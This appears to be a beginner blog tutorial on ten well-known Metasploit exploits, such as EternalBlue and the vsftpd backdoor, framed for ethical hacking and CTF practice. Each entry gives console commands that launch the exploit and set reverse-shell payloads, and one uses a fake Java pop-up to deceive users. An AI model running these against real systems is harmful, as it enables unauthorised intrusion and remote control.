Select Page

Top 10 Metasploit Exploits Every Ethical Hacker Should Know 

Are you curious about how ethical hackers break into systems — legally and ethically? Metasploit is one of the most popular tools used in cybersecurity for testing and finding weaknesses in systems. Think of it like a hacking toolbox — it gives you everything you need to try out real-world attacks in a safe way.

In this beginner-friendly guide, we’ll look at the 10 most used Metasploit exploits. For each one, you’ll learn:

  • What it is

  • What it does (in plain English)

  • How to use it step-by-step

Whether you’re studying cybersecurity, doing a Capture the Flag (CTF), or just learning for fun, this guide will help you get started with confidence

1. EternalBlue (ms17_010_eternalblue)

CVE: CVE-2017-0144
What It Does: Targets a bug in Windows file sharing and gives you remote control of the system — no login needed.

Famous For: The WannaCry ransomware attack

Command Example:

use exploit/windows/smb/ms17_010_eternalblue
set RHOST 
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 
exploit

Why It’s Useful: You get full access to the target system without needing a username or password.

2. NetAPI Buffer Overflow (ms08_067_netapi)

NetAPI Buffer Overflow

CVE: CVE-2008-4250
What It Does: Crashes an old Windows service in a way that lets you run your own code.

Command Example:

use exploit/windows/smb/ms08_067_netapi
set RHOST 
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 
exploit
exploit

Why It’s Useful: Still works on outdated systems and is great for learning.

3.  PsExec (psexec)

PsExec (psexec)

What It Does: Lets you run commands on a Windows machine if you already have a valid username and password.

Command Example:

use exploit/windows/smb/psexec
set RHOST 
set SMBUser 
set SMBPass 
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 
exploit

Why It’s Useful: Excellent for moving deeper into a network once you’ve cracked one machine.

4. Java Signed Applet (java_signed_applet)

Java Signed Applet

What It Does: Creates a fake Java pop-up. If the user clicks “Run,” you gain access to their system.

Command Example:

use exploit/multi/browser/java_signed_applet
set SRVHOST 
set URIPATH /
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 
exploit

Why It’s Useful: Great example of combining hacking with social engineering.

5. Multi/Handler (multi/handler)

Multi/Handler (multi/handler)

What It Does: It doesn’t hack anything directly. It waits for a hacked system to call you back.

Command Example:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 
set LPORT 
exploit

Why It’s Useful: Must-have for receiving reverse shells after sending a payload

6. VSFTPD Backdoor (vsftpd_234_backdoor)

6. VSFTPD Backdoor (vsftpd_234_backdoor)

What It Does: Targets a secret backdoor in a specific version of an FTP server used on Linux.

Command Example:

use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST 
exploit

Why It’s Useful: Easy way to get a shell on a vulnerable machine. Common in practice labs.

7. phpMyAdmin LFI (phpmyadmin_lfi_rce)

phpMyAdmin LFI (phpmyadmin_lfi_rce)

What It Does: Uses a flaw in phpMyAdmin to run your code on the web server.

Command Example:

use exploit/multi/http/phpmyadmin_lfi_rce
set RHOST 
set TARGETURI /phpmyadmin
exploit

Why It’s Useful: Useful for attacking poorly configured web servers.

8. HFS Remote Code Execution (rejetto_hfs_exec)

HFS Remote Code Execution (rejetto_hfs_exec)

What It Does: Takes advantage of a bug in an old Windows file server to run your own code.

Command Example:

use exploit/windows/http/rejetto_hfs_exec
set RHOST 
set TARGETURI /
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 
exploit

Why It’s Useful: Easy shell access. Often used in CTF and training challenges.

9. Samba Usermap Script (samba_usermap_script)

Samba Usermap Script

What It Does: Attacks Linux file-sharing services that are misconfigured, letting you run commands.

Command Example:

use exploit/multi/samba/usermap_script
set RHOST 
set PAYLOAD cmd/unix/reverse
set LHOST 
exploit

Why It’s Useful: No need for login. Works on vulnerable Linux systems.

10. Android WebView Exploit (webview_addjavascriptinterface)

Android WebView Exploit (webview_addjavascriptinterface)

What It Does: Lets you control Android phones running old apps with insecure browser settings.

Command Example:

use exploit/android/browser/webview_addjavascriptinterface
set SRVHOST 
set URIPATH /
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 
exploit

Why It’s Useful: Shows how mobile devices can be hacked through malicious websites.

Metasploit is a great tool for learning how hackers think and act — but always use it ethically and legally. If you’re new to cybersecurity, start with safe environments like TryHackMe, Hack The Box, or your own virtual machine setup.

These 10 Metasploit exploits are not only commonly used, but also essential for building hands-on skills in ethical hacking.